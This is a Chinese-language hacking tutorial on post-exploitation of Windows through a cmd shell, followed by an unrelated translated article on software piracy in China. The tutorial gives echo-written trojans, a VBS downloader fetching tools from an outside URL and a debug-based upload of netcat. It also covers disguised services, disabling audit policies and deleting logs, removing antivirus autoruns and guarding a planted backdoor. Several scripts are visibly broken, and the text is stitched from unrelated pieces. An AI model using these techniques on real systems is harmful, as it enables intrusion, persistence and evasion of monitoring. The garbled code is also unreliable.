UtilMan.exe 从一个窗口中启动和配置辅助工具。
msiexec.exe依据 .MSI 文件中包含的命令来安装、修复以及删除软件。
]]>

Do All in Cmd Shell

www.xfocus.net

目录
1,前言
2,文件传输
3,系统配置
4,网络配置
5,软件安装
6,Windows脚本
7,附言

前言
Cmd Shell(命令行交互)是黑客永恒的话题,它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。

文件传输
对 于溢出漏洞获得的cmd shell,最大的问题就是如何上传文件。由于蠕虫病毒流行,连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对 ipc$的保护,通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法,介于其已被大家熟知,本文就不介绍了。还有三种大 家熟悉的办法,作为总结我再提一下:

1,用Echo命令写ASP木马。
前提当然是目标主机上已经安装了IIS。
一般的ASP木马“体积”较大,不适合直接用echo命令写入文件,这里我提供一个小巧的。
直接给出echo版:

@echo ^ >up.asp

注意,只有一行,中间没有回车符。
生成的up.asp不能用浏览器访问,只能用下面这个脚本:

with wscript
if .arguments.count>dl.vbs
@echo w.open “get”,.arguments(0),0:w.send:if w.status^>200 then .echo “Error:”+w.status:.quit>>dl.vbs
@echo aso.type=1:aso.open:aso.write w.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbs

举例——下载ps.exe并保存到c:/path下:

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:/path/ps.exe

注意,这是在远程shell中执行的。

4,Echo经过编码的任何文件,再用脚本+debug还原。
前面两个办法都不能保证穿过防火墙。而且,除非自己架Web服务器,一般的Web资源都是以压缩文件的形式提供。如果目标主机没有解压工具,还是没辙。那么只有出“杀手锏”了!

echo 命令加重定向x作符可以写入ASCII码小于128的字符,但大于等于128的不行。只有将本地文件重新“编码”为可显示的字符,才能方便地写入远程主 机。首先能想到的就是base64编码,即email附件的编码方式。但vbs不支持位x作,因此编码和解码较复杂。更麻烦的是,脚本以二进制流方式处理 文件的能力很差。(ADODB.Stream可以以流方式写文件,但我无法构造出相应的数据类型。二进制数据流可以用midb函数转成字符串,但反过来不 行。我花了两天时间,还是没能解决这个问题。如果有谁能用vbs或js写任意的字节数据到文件中,恳请赐教。)

无奈只有请debug.exe出马了。原理很多人都知道,我不介绍了,直接给出成果——编码脚本:

fp=wscript.arguments(0)
fn=right(fp,len(fp)-instrrev(fp,”/”))
with createobject(“adodb.stream”)
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl/65536
with createobject(“scripting.filesystemobject”).opentextfile(fp&”.bat”,2,true)
.write “@echo str=”””
for i=1 to sl
bt=ascb(midb(str,i,1))
if bt>debug.vbs”+vbcrlf+”@echo +”””
next
.writeline “””>>debug.vbs”+vbcrlf+”@echo with wscript.stdout:r=vbcrlf”_
+”:for i=1 to len(str) step 48:.write “”e””+hex(256+(i-1)/2)”_
+”:for j=i to i+46 step 2:.write “” “”+mid(str,j,2):next:.write r:next>>debug.vbs”
.writeline “@echo .write “”rbx””+r+”””+hex(slh)+”””+r+””rcx””+r+”””+hex(sll)_
+”””+r+””n debug.tmp””+r+””w””+r+””q””+r:end with”_
+”>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp “””&fn&”””&del debug.vbs”
end with

将其保存为echo.vbs。假设要上传nc.exe,那么在本地命令行输入命令:

cscript echo.vbs nc.exe

也可以直接把要传输的文件的图标拖放到脚本文件的图标上。
稍等一会儿,在当前目录下将生成一个nc.exe.bat。用记事本等编辑工具打开它,可以看到如下内容:

@echo str=”4D5A90000300000004000000FFFF0000B80000000000
0000400000000000000000000000000000000000000000000
000000000000000000000000000800000000E1FBA0E00B409
CD21B8014CCD21546869732070726F6772616D2063616E6E6
F742062652072756E20696E20444F53206D6F64652E0D0D0A
2400000000000000″_>>debug.vbs
@echo +”504500004C010400B98EAE340000000000000000E0000F0
10B010500009800000062000000000000004C000000100000
00B0000000004000001000000002000004000000000000000
4000000000000000030010000040000000000000300000000
0010000010000000001000001000000000000010000000000
0000000000000″_>>debug.vbs
@echo +”002001003C0000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000
0000000000000000000000000000000A02101006401000000
00000000000000000000000000000000000000000000002E7
4657874000000″_>>debug.vbs
@echo +”70970000001000000098000000040000000000000000000
000000000200000602E726461746100001704000000B00000
00060000009C0000000000000000000000000000400000402
E646174610000004452000000C00000003E000000A2000000
0000000000000000000000400000C02E696461746100005C0
7000000200100″_>>debug.vbs
…………
…………(省略若干行)
…………
@echo +””>>debug.vbs
@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write “e”+hex(256+(i-1)/2):for j=i to i+46 step 2:.write ” “+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write “rbx”+r+”0″+r+”rcx”+r+”E800″+r+”n debug.tmp”+r+”w”+r+”q”+r:end with>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp “NC.EXE”&del debug.vbs

全选 -》 复制 -》 切换到远程命令行窗口 -》 粘贴。
如果网速不是很慢的话,整个上传过程大约需要20秒。

几点说明:
1,大的文件传输不稳定,可能会使shell死掉。所以文件越小效果越好。建议原文件不要超过100KB。
2,在传输大文件前,可以先传个小的文件作为“热身”,让16位虚拟机ntvdm.exe驻留后台。所有文件传完后,为隐蔽起见,应该把ntvdm进程杀掉。
3,某些cmd shell每个命令都需要附加两个回车,那nc.exe.bat就不能直接用了。
4, 单个命令的长度是有限的,所以不能只用一个echo完成全部任务。而且,对于nc提供的cmd shell,稍长一些的命令竟然会使shell自动退出(溢出了?)。你可以修改”i mod 128=0″语句中的128以调整每个echo命令的长度。每次echo的字符为这个数乘以2。
5,解码过程没有脚本参与也是可以的。使用脚本的目的是减少传输的数据量(因为压缩了数据)。如果有时间,我会写一个更完善的脚本,加强数据压缩能力,增加数据校验功能。

能上传文件当然一切都好办了,但很多x作用Windows自带的工具更方便。在你到处寻找需要的工具时,不要忘了Windows本身。

系统配置
这节包括三方面内容:注册表、服务和组策略。

先说注册表。很多命令行下访问注册表的工具都是交互式的,溢出产生的shell一般不能再次重定向输入/输出流,所以无法使用。好在系统自带的regedit.exe足够用了。

1,读取注册表
先将想查询的注册表项导出,再用type查看,比如:

C:/>regedit /e 1.reg “HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp”

C:/>type 1.reg | find “PortNumber”
“PortNumber”=dword:00000d3d

C:/>del 1.reg

所以终端服务的端口是3389(十六进制d3d)

2,修改/删除注册表项
先echo一个reg文件,然后导入,比如:

echo Windows Registry Editor Version 5.00 >1.reg
echo. >>1.reg
echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/TelnetServer/1.0] >>1.reg
echo “TelnetPort”=dword:00000913 >>1.reg
echo “NTLM”=dword:00000001 >>1.reg
echo. >>1.reg
regedit /s 1.reg

将telnet服务端口改为2323(十六进制913),NTLM认证方式为1。

要删除一个项,在名字前面加减号,比如:

[-HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Serv-U]

要删除一个值,在等号后面用减号,比如:

[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
“KAVRun”=-

3,用inf文件访问注册表
上面对注册表的三个x作,也可以用下面这个inf文件来实现:

[Version]
Signature=”$WINDOWS NT$”
[DefaultInstall]
AddReg=My_AddReg_Name
DelReg=My_DelReg_Name
[My_AddReg_Name]
HKLM,SOFTWARE/Microsoft/TelnetServer/1.0,TelnetPort,0x00010001,2323
HKLM,SOFTWARE/Microsoft/TelnetServer/1.0,NTLM,0x00010001,1
[My_DelReg_Name]
HKLM,SYSTEM/CurrentControlSet/Services/Serv-U
HKLM,SOFTWARE/Microsoft/Windows/CurrentVersion/Run,KAVRun

将它写入c:/path/reg.inf然后用下面这个命令“安装”:

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/path/reg.inf

几点说明:
1,[Version]和[DefaultInstall]是必须的,AddReg和DelReg至少要有一个。My_AddReg_Name和My_DelReg_Name可以自定义。
0x00010001表示REG_DWORD数据类型,0x00000000或省略该项(保留逗号)表示REG_SZ(字符串)。0x00020000表示REG_EXPAND_SZ。2323也可以用0x913代替。
关于inf文件的详细信息,可以参考DDK帮助文档。
2,InstallHinfSection是大小写敏感的。它和setupapi之间只有一个逗号,没有空格。128表示给定路径,该参数其他取值及含义参见MSDN。特别注意,最后一个参数,必须是inf文件的全路径,不要用相对路径。
3,inf文件中的项目都是大小写不敏感的。

接下来说服务。如果想启动或停止服务,用net命令就可以。但想增加或删除服务,需要用SC,instsrv.exe,xnet.exe等工具。而这些工具系统没有自带(XP和2003自带SC)。导入注册表虽然可以,但效果不好,这里我们请inf文件出马。

增加一个服务:

[Version]
Signature=”$WINDOWS NT$”
[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name
[My_AddService_Name]
DisplayName=Windows Internet Service
Description=提供对 Internet 信息服务管理的支持。
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=%11%/inetsvr.exe

保存为inetsvr.inf,然后:

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:/path/inetsvr.inf

这个例子增加一个名为inetsvr的服务(是不是很像系统自带的服务,呵呵)。

几点说明:
1,最后四项分别是
服务类型:0x10为独立进程服务,0x20为共享进程服务(比如svchost);
启动类型:0 系统引导时加载,1 OS初始化时加载,2 由SCM(服务控制管理器)自动启动,3 手动启动,4 禁用。
(注意,0和1只能用于驱动程序)
错误控制:0 忽略,1 继续并警告,2 切换到LastKnownGood的设置,3 蓝屏。
服务程序位置:%11%表示system32目录,%10%表示系统目录(WINNT或Windows),%12%为驱动目录system32/drivers。其他取值参见DDK。你也可以不用变量,直接使用全路径。

这四项是必须要有的。

2,除例子中的六个项目,还有LoadOrderGroup、Dependencies等。不常用所以不介绍了。
3,inetsvr后面有两个逗号,因为中间省略了一个不常用的参数flags。

删除一个服务:

[Version]
Signature=”$WINDOWS NT$”
[DefaultInstall.Services]
DelService=inetsvr

很简单,不是吗?

当然,你也可以通过导入注册表达到目的。但inf自有其优势。
1,导出一个系统自带服务的注册表项,你会发现其执行路径是这样的:
“ImagePath”=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,/
74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,74,/
00,6c,00,6e,00,74,00,73,00,76,00,72,00,2e,00,65,00,78,00,65,00,00,00
可 读性太差。其实它就是%SystemRoot%/system32/tlntsvr.exe,但数据类型是REG_EXPAND_SZ。当手动导入注册表 以增加服务时,这样定义ImagePath显然很不方便。而使用inf文件就完全没有这个问题,ServiceBinary(即ImagePath)自动 成为REG_EXPAND_SZ。
2,最关键的是,和用SC等工具一样,inf文件的效果是即时起效的,而导入reg后必须重启才有效。
3,inf文件会自动为服务的注册表项添加一个Security子键,使它看起来更像系统自带的服务。

另外,AddService和DelService以及AddReg、DelReg可以同时且重复使用。即可以同时增加和删除多个服务和注册表项。详细的内容还是请查看DDK。

最后说说组策略。组策略是建立Windows安全环境的重要手段,尤其是在Windows域环境下。一个出色的系统管理员,应该能熟练地掌握并应用组策略。在窗口界面下访问组策略用gpedit.msc,命令行下用secedit.exe。

先看secedit命令语法:
secedit /analyze
secedit /configure
secedit /export
secedit /validate
secedit /refreshpolicy
5个命令的功能分别是分析组策略、配置组策略、导出组策略、验证模板语法和更新组策略。其中
secedit /refreshpolicy 在XP/2003下被gpupdate代替。这些命令具体的语法自己在命令行下查看就知道了。

与访问注册表只需reg文件不同的是,访问组策略除了要有个模板文件(还是inf),还需要一个安全数据库文件(sdb)。要修改组策略,必须先将模板导入安全数据库,再通过应用安全数据库来刷新组策略。来看个例子:

假设我要将密码长度最小值设置为6,并启用“密码必须符合复杂性要求”,那么先写这么一个模板:

[version]
signature=”$CHICAGO$”
[System Access]
MinimumPasswordLength = 6
PasswordComplexity = 1

保存为gp.inf,然后导入:

secedit /configure /db gp.sdb /cfg gp.inf /quiet

这个命令执行完成后,将在当前目录产生一个gp.sdb,它是“中间产品”,你可以删除它。
/quiet参数表示“安静模式”,不产生日志。但根据我的试验,在2000sp4下该参数似乎不起作用,XP下正常。日志总是保存在%windir%/security/logs/scesrv.log。你也可以自己指定日志以便随后删除它。比如:

secedit /configure /db gp.sdb /cfg gp.inf /log gp.log
del gp.*

另外,在导入模板前,还可以先分析语法是否正确:

secedit /validate gp.inf

那么,如何知道具体的语法呢?当然到MSDN里找啦。也有偷懒的办法,因为系统自带了一些安全模板,在%windir%/security/templates目录下。打开这些模板,基本上包含了常用的安全设置语法,一看就懂。

再举个例子——关闭所有的“审核策略”。(它所审核的事件将记录在事件查看器的“安全性”里)。
echo版:

echo [version] >1.inf
echo signature=”$CHICAGO$” >>1.inf
echo [Event Audit] >>1.inf
echo AuditSystemEvents=0 >>1.inf
echo AuditObjectAccess=0 >>1.inf
echo AuditPrivilegeUse=0 >>1.inf
echo AuditPolicyChange=0 >>1.inf
echo AuditAccountManage=0 >>1.inf
echo AuditProcessTracking=0 >>1.inf
echo AuditDSAccess=0 >>1.inf
echo AuditAccountLogon=0 >>1.inf
echo AuditLogonEvents=0 >>1.inf
secedit /configure /db 1.sdb /cfg 1.inf /log 1.log /quiet
del 1.*

也 许有人会说:组策略不是保存在注册表中吗,为什么不直接修改注册表?因为不是所有的组策略都保存在注册表中。比如“审核策略”就不是。你可以用 regsnap比较修改该策略前后注册表的变化。我测试的结果是什么都没有改变。只有“管理模板”这一部分是完全基于注册表的。而且,知道了具体位置,用 哪个方法都不复杂。

比如,XP和2003的“本地策略”-》“安全选项”增加了一个“本地帐户的共享和安全模式”策略。XP下默认的设置是“仅来宾”。这就是为什么用管理员帐号连接XP的ipc$仍然只有Guest权限的原因。可以通过导入reg文件修改它为“经典”:

echo Windows Registry Editor Version 5.00 >1.reg
echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Lsa] >>1.reg
echo “forceguest”=dword:00000000 >>1.reg
regedit /s 1.reg
del 1.reg

而相应的用inf,应该是:

echo [version] >1.inf
echo signature=”$CHICAGO$” >>1.inf
echo [Registry Values] >>1.inf
echo MACHINE/System/CurrentControlSet/Control/Lsa/ForceGuest=4,0 >>1.inf
secedit /configure /db 1.sdb /cfg 1.inf /log 1.log
del 1.*

关于命令行下读取组策略的问题。
系统默认的安全数据库位于%windir%/security/database/secedit.sdb,将它导出至inf文件:

secedit /export /cfg gp.inf /log 1.log

没有用/db参数指定数据库就是采用默认的。然后查看gp.inf。

不 过,这样得到的只是组策略的一部分(即“Windows设置”)。而且,某个策略如果未配置,是不会被导出的。比如“重命名系统管理员帐户”,只有被定义 了才会在inf文件中出现NewAdministratorName=”***”。对于无法导出的其他的组策略只有通过访问注册表来获得了。
此办法在XP和2003下无效——可以导出但内容基本是空的。原因不明。根据官方的资料,XP和2003显示组策略用RSoP(组策略结果集)。相应的命令行工具是gpresult。
但是,它获得的是在系统启动时被附加(来自域)的组策略,单机测试结果还是“空”。所以,如果想知道某些组策略是否被设置,只有先写一个inf,再用secedit /analyze,然后查看日志了。

网络配置
Windows 自带的关于网络的命令行工具很多,比如大家熟悉的ping, tracert, ipconfig, telnet, ftp, tftp, netstat,还有不太熟悉的nbtstat, pathping, nslookup, finger, route, netsh……
这些命令又可分成三类:网络检测(如ping)、网络连接(如telnet)和网络配置(如netsh)。前面两种相对简单,本文只介绍两个网络配置工具。

netsh
在 远程shell中使用netsh首先要解决一个交互方式的问题。前面说过,很多shell不能再次重定向输出输出,所以不能在这种环境下交互地使用ftp 等命令行工具。解决的办法是,一般交互式的工具都允许使用脚本(或者叫应答文件)。比如ftp -s:filename。netsh也是这样:netsh -f filename。

netsh命令的功能非常多,可以配置IAS、DHCP、RAS、WINS、NAT服务器,TCP/IP协议,IPX协议,路由等。我们不是管理员,一般没必要了解这么多,只需用netsh来了解目标主机的网络配置信息。

1,TCP/IP配置

echo interface ip >s
echo show config >>s
netsh -f s
del s

由此你可以了解该主机有多个网卡和IP,是否是动态分配IP(DHCP),内网IP是多少(如果有的话)。这个命令和ipconfig /all差不多。

注意,以下命令需要目标主机启动remoteaccess服务。如果它被禁用,请先通过导入注册表解禁,然后net start remoteaccess

2,ARP

echo interface ip >s
echo show ipnet >>s
netsh -f s
del s

这个比arp -a命令多一点信息。

3,TCP/UDP连接

echo interface ip >s
echo show tcpconn >>s
echo show udpconn >>s
netsh -f s
del s

这组命令和netstat -an一样。

4,网卡信息
如果netsh命令都有其他命令可代替,那它还有什么存在的必要呢?下面这个就找不到代替的了。

echo interface ip >s
echo show interface >>s
netsh -f s
del s

netsh的其他功能,比如修改IP,一般没有必要使用(万一改了IP后连不上,就“叫天不应叫地不灵”了),所以全部略过。

IPSec
首先需要指出的是,IPSec和TCP/IP筛选是不同的东西,大家不要混淆了。TCP/IP筛选的功能十分有限,远不如IPSec灵活和强大。下面就说说如何在命令行下控制IPSec。

XP 系统用ipseccmd,2000下用ipsecpol。遗憾的是,它们都不是系统自带的。ipseccmd在xp系统安装盘的 SUPPORT/TOOLS/SUPPORT.CAB 中,ipsecpol在2000 Resource Kit里。而且,要使用ipsecpol还必须带上另外两个文件:ipsecutil.dll和text2pol.dll。三个文件一共119KB。

IPSec可以通过组策略来控制,但我找遍MSDN,也没有找到相应的安全模板的语法。已经配置好的IPSec策略也不能被导出为模板。所以,组策略这条路走不通。IPSec的设置保存在注册表中
(HKEY_LOCAL_MACHINE/SOFTWARE /Policies/Microsoft/Windows/IPSec/Policy/Local),理论上可以通过修改注册表来配置IPSec。但很多 信息以二进制形式存放,读取和修改都很困难。相比之下,上传命令行工具更方便。

关于ipsecpol和ipseccmd的资料,网上可以找到很多,因此本文就不细说了,只是列举一些实用的例子。
在设置IPSec策略方面,ipseccmd命令的语法和ipsecpol几乎完全一样,所以只以ipsecpol为例:

1,防御rpc-dcom攻击

ipsecpol -p myfirewall -r rpc-dcom -f *+0:135:tcp *+0:135:udp *+0:137:udp *+0:138:udp *+0:139:tcp *+0:445:tcp *+0:445:udp -n BLOCK -w reg -x

这条命令关闭了本地主机的TCP135,139,445和udp135,137,138,445端口。
具体含义如下:
-p myfirewall 指定策略名为myfirewall
-r rpc-dcom 指定规则名为rpc-dcom
-f …… 建立7个筛选器。*表示任何地址(源);0表示本机地址(目标);+表示镜像(双向)筛选。详细语法见ipsecpol -?
-n BLOCK 指定筛选x作是“阻塞”。注意,BLOCK必须是大写。
-w reg 将配置写入注册表,重启后仍有效。
-x 立刻激活该策略。

2,防止被ping

ipsecpol -p myfirewall -r antiping -f *+0::icmp -n BLOCK -w reg -x

如果名为myfirewall的策略已存在,则antiping规则将添加至其中。
注意,该规则同时也阻止了该主机ping别人。

3,对后门进行IP限制
假设你在某主机上安装了DameWare Mini Remote Control。
为了保护它不被别人暴破密码或溢出,应该限制对其服务端口6129的访问。

ipsecpol -p myfw -r dwmrc_block_all -f *+0:6129:tcp -n BLOCK -w reg
ipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.89+0:6129:tcp -n PASS -w reg -x

这样就只有123.45.67.89可以访问该主机的6129端口了。
如果你是动态IP,应该根据IP分配的范围设置规则。比如:

ipsecpol -p myfw -r dwmrc_block_all -f *+0:6129:tcp -n BLOCK -w reg
ipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.*+0:6129:tcp -n PASS -w reg -x

这样就允许123.45.67.1至123.45.67.254的IP访问6129端口。

在写规则的时候,应该特别小心,不要把自己也阻塞了。如果你不确定某个规则的效果是否和预想的一样,可以先用计划任务“留下后路”。例如:

c:/>net start schedule
Task Scheduler 服务正在启动 ..
Task Scheduler 服务已经启动成功。

c:/>time /t
12:34

c:/>at 12:39 ipsecpol -p myfw -y -w reg
新加了一项作业,其作业 ID = 1

然后,你有5分钟时间设置一个myfw策略并测试它。5分钟后计划任务将停止该策略。如果测试结果不理想,就删除该策略。

c:/>ipsecpol -p myfw -o -w reg

注意,删除策略前必须先确保它已停止。不停止它的话,即使删除也会在一段时间内继续生效。持续时间取决于策略的刷新时间,默认是180分钟。

如果测试通过,那么就启用它。

c:/>ipsecpol -p myfw -x -w reg

最后说一下查看IPSec策略的办法。
对于XP很简单,一条命令搞定——ipseccmd show filters
而ipsecpol没有查询的功能。需要再用一个命令行工具netdiag。它位于2000系统安装盘的SUPPORT/TOOLS/SUPPORT.CAB中。(已经上传了三个文件,也就不在乎多一个了。)

netdiag需要RemoteRegistry服务的支持。所以先启动该服务:

net start remoteregistry

不启动RemoteRegistry就会得到一个错误:

[FATAL] Failed to get system information of this machine.

netdiag这个工具功能十分强大,与网络有关的信息都可以获取!不过,输出的信息有时过于详细,超过命令行控制台cmd.exe的输出缓存,而不是每个远程cmd shell都可以用more命令来分页的。

查看ipsec策略的命令是:
netdiag /debug /test:ipsec

然后是一长串输出信息。IPSec策略位于最后。

软件安装
一个软件/工具的安装过程,一般来说只是做两件事:拷贝文件到特定目录和修改注册表。只要搞清楚具体的内容,那么就可以自己在命令行下实现了。(不考虑安装后需要注册激活等情况)

WinPcap是个很常用的工具,但必须在窗口界面下安装。在网上也可以找到不用GUI的版本(但还是有版权页),其实我们完全可以自己做一个。

以WinPcap 3.0a 为例。通过比较安装前后的文件系统和注册表快照,很容易了解整个安装过程。
除 去反安装的部分,关键的文件有三个:wpcap.dll,packet.dll和npf.sys。前面两个文件位于system32目录下,第三个在 system32/drivers下。而注册表的变化是增加了一个系统服务NPF。注意,是系统服务(即驱动)不是Win32服务。

作 为系统服务,不但要在HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services下增加主键,在 HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Enum/Root下也增加主键。而后者默认只有 SYSTEM身份才可以修改。幸运的是,并不需要手动添加它,winpcap被调用时会自动搞定。甚至完全不用手动修改注册表,所有的事winpcap都 会自己完成,只需要将三个文件复制到合适的位置就行了。

作为范例,还是演示一下如何修改注册表:利用前面说过的inf文件来实现。

[Version]
Signature=”$WINDOWS NT$”
[DefaultInstall.Services]
AddService=NPF,,winpcap_svr
[winpcap_svr]
DisplayName=Netgroup Packet Filter
ServiceType=0x1
StartType=3
ErrorControl=1
ServiceBinary=%12%/npf.sys

将上面这些内容保存为_wpcap_.inf文件。
再写一个批处理_wpcap_.bat:

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %CD%/_wpcap_.inf
del _wpcap_.inf
if /i %CD%==%SYSTEMROOT%/system32 goto COPYDRV
copy packet.dll %SYSTEMROOT%/system32/
copy wpcap.dll %SYSTEMROOT%/system32/
del packet.dll
del wpcap.dll
:COPYDRV
if /i %CD%==%SYSTEMROOT%/system32/drivers goto END
copy npf.sys %SYSTEMROOT%/system32/drivers/
del npf.sys
:END
del %0

然后用winrar将所有文件(5个)打包为自解压的exe,并将『高级自解压选项』->『解压后运行』设置为_wpcap_.bat,命令行的winpcap安装包就制作完成了。

注意,批处理最后一行没有回车符。否则会因为正在运行而无法删除自己。

所有的软件安装,基本上可以套用这个思路。但也有例外的,那就是系统补丁的安装。幸好,Windows补丁包支持命令行安装。
比如:

KB824146.exe -n -z -q

-n 不保留备份
-z 不重起
-q 安静模式

如果有一堆补丁要打,那么用RAR打包成自解压文件,外加一个批处理。

for %%f in (KB??????.exe) do %%f -n -z -q
for %%f in (KB??????.exe) do del %%f
del %0

Windows脚本
很多事用脚本来做是很简洁的。下面给出几个常用脚本的echo版。

1,显示系统版本

@echo for each ps in getobject _ >ps.vbs
@echo (“winmgmts://./root/cimv2:win32_operatingsystem”).instances_ >>ps.vbs
@echo wscript.echo ps.caption^&” “^&ps.version:next >>ps.vbs
cscript //nologo ps.vbs & del ps.vbs

2,列举进程

@echo for each ps in getobject _ >ps.vbs
@echo (“winmgmts://./root/cimv2:win32_process”).instances_ >>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs
cscript //nologo ps.vbs & del ps.vbs

3,终止进程

@echo for each ps in getobject _ >pk.vbs
@echo (“winmgmts://./root/cimv2:win32_process”).instances_ >>pk.vbs
@echo if ps.handle=wscript.arguments(0) then wscript.echo ps.terminate:end if:next >>pk.vbs

要终止PID为123的进程,使用如下语法:
cscript pk.vbs 123

如果显示一个0,表示终止成功。

然后:
del pk.vbs

4,重启系统

@echo for each os in getobject _ >rb.vbs
@echo (“winmgmts:{(shutdown)}!//./root/cimv2:win32_operatingsystem”).instances_ >>rb.vbs
@echo os.win32shutdown(2):next >>rb.vbs & cscript //nologo rb.vbs & del rb.vbs

5,列举自启动的服务

@echo for each sc in getobject(“winmgmts://./root/cimv2:win32_service”).instances_ >sc.vbs
@echo if sc.startmode=”Auto” then wscript.echo sc.name^&” – “^&sc.pathname >>sc.vbs
@echo next >>sc.vbs & cscript //nologo sc.vbs & del sc.vbs

6,列举正在运行的服务

@echo for each sc in getobject(“winmgmts://./root/cimv2:win32_service”).instances_ >sc.vbs
@echo if sc.state=”Running” then wscript.echo sc.name^&” – “^&sc.pathname >>sc.vbs
@echo next >>sc.vbs & cscript //nologo sc.vbs & del sc.vbs

7,显示系统最后一次启动的时间

@echo for each os in getobject _ >bt.vbs
@echo (“winmgmts://./root/cimv2:win32_operatingsystem”).instances_ >>bt.vbs
@echo wscript.echo os.lastbootuptime:next >>bt.vbs & cscript //nologo bt.vbs & del bt.vbs

显示结果的格式是:
yyyymmddHHMMSS******ZZZZ
_年_月日时分秒_微秒_时区

8,显示系统运行时间

@echo for each os in getobject _ >rt.vbs
@echo (“winmgmts://./root/cimv2:win32_perfrawdata_perfos_system”).instances_ >>rt.vbs
@echo s=os.timestamp_sys100ns:l=len(s):s=left(s,l-7):for i=1 to l-7 >>rt.vbs
@echo t=t^&mid(s,i,1)=t/86400:r=r^&d:t=t mod 86400:next >>rt.vbs
@echo wscript.echo cint&reg;^&”d “^&t/3600^&”h “^&t/60 mod 60^&”m “^&t mod 60^&”s”:next >>rt.vbs
cscript //nologo rt.vbs & del rt.vbs

这个运行时间是从性能计数器中获得的64位整型数,不会出现在49.7天后溢出的情况。

附言
cmd shell博大精深,本文挂一漏万讲了一些常用技巧,希望对各位有所帮助。

也许你早知道了这些方法,也许你有更好的方法,希望你能写出来和大家分享。

最后,感谢你耐心看完本文。本人水平有限,错误之处恳请指正。

日本人评-中国盗版

中国は「海賊版」から逃れられるか
日本人评中国盗版-请暂时抛开民族情绪看待这篇文章(来源于各网站)

下文中的内容编译自日本一家有名的IT资讯类网站ITmedia,会日语的网友可以到这里查看相关的日文原文。
http://www.itmedia.co.jp/pcupdate/articles/0504/18/news011.html

—————————————————————————————————————

每次在谈论中国的PC发展情况的时候,总是无法回避“非法拷贝”这样的话题。数字是比较触目惊心的,根据2003年的统计,中国的PC机器中所使用的“非法拷贝”,也就是盗版软件的比率高达92%,和越南并列世界第一位。顺便说下,日本也并不是没有盗版情况的发生,这次调查中日本PC中使用盗版的比率为 29%。

换句话说,如果平均每台PC装有100个应用软件的话,中国每台的PC中会有92个盗版软件,而每台日本的PC中将会有29个。不过,数字只是表现出来的现象,下面我们就一起来看看数字背后所隐藏的东西,从富裕城市到贫穷农村的PC发展状况。

大都市上海:一月工资可以攒台电脑
上海是中国最富裕的城市,也是日本人去中国旅游最喜欢选择的城市,在日本人看来,那里所有的商品都十分的便宜。但是这仅仅是对日本人来说,在上海一般公司员工的平均工资为4万日元(约3000元人民币),一顿饭的花费约在130日元(10元人民币),不过如果要吃比较高档的餐厅就要花上大概5-10倍的价格。在其他比较大型的城市,比如北京、深圳、广州,虽然稍微便宜点,但是总体来说,是处于同一水平线上的。

但是在PC业界来说,无论是在世界的任何地方,价格都不会相差太大的。以Lenovo为首的许多中国制造厂商都采用了这样的策略,用流行的17英寸液晶显示器以及最小硬件构成附加DOS系统或者Linux系统。这样的PC机器的售价在5万日元左右(3800元人民币)。对于大城市的人来说,也就是一个月工资稍微多一点的价格。他们买一台电脑的感觉就相当于日本人买一台30万日元(22800元人民币)一样的消费。

在中国的大城市中,由于实施独生子女政策,很多家庭作为对将来的投资,都购买PC对孩子进行教育。另外一方面,目前中国社会上也有很多用于游戏或者聊天的网吧使用着大量的PC机器。

省会城市:一季度工资装台电脑
除了这些大城市,中国一般的省会城市的人平均月收入在1-2万日元左右(700-1500元人民币),吃一顿饭的话需要40-80日元(3-6元人民币)。对于这样规模城市的人来说,“5万日元PC”(3800元人民币)是他们月工资的3-4倍,对于日本人的消费感觉来说,差不多就相当于买台PC机器需要花上100万日元了(76000元人民币)。一套Windows XP Home Edition大约2万日元的价格(1520元人民币),也比他们的月收入要高了。

所有的省会级别城市都有专门的电脑街,一部分来说比起那些大型城市的电脑街来说也不逊色,但是在产品的种类上可能稍差一点。习惯了秋叶原的笔者参观过以后感觉到奇怪的是,即使是比较大型的PC商店,所经营的品种一般也都比较单一,这大概跟中国多采用专卖店的形式有关吧。

省会城市的平均工资只有1-2万日元(700-1500元人民币),大概很多读者朋友会感觉十分惊讶;但是在比省会城市更小的城市中,人们的收入更加的低。在县厅所级别的城市中,几乎没有成规模的电脑街,但是还是有不少的电脑商家。在这些小城市中,中国最大的Lenovo、Founder、清华同方等企业都有经销商,而且这些城市都有很多网吧,这些网吧通常开在学校的周围,利用广大学生对PC比较感兴趣而开展事业。

农村:辛苦一年还不一定买的起
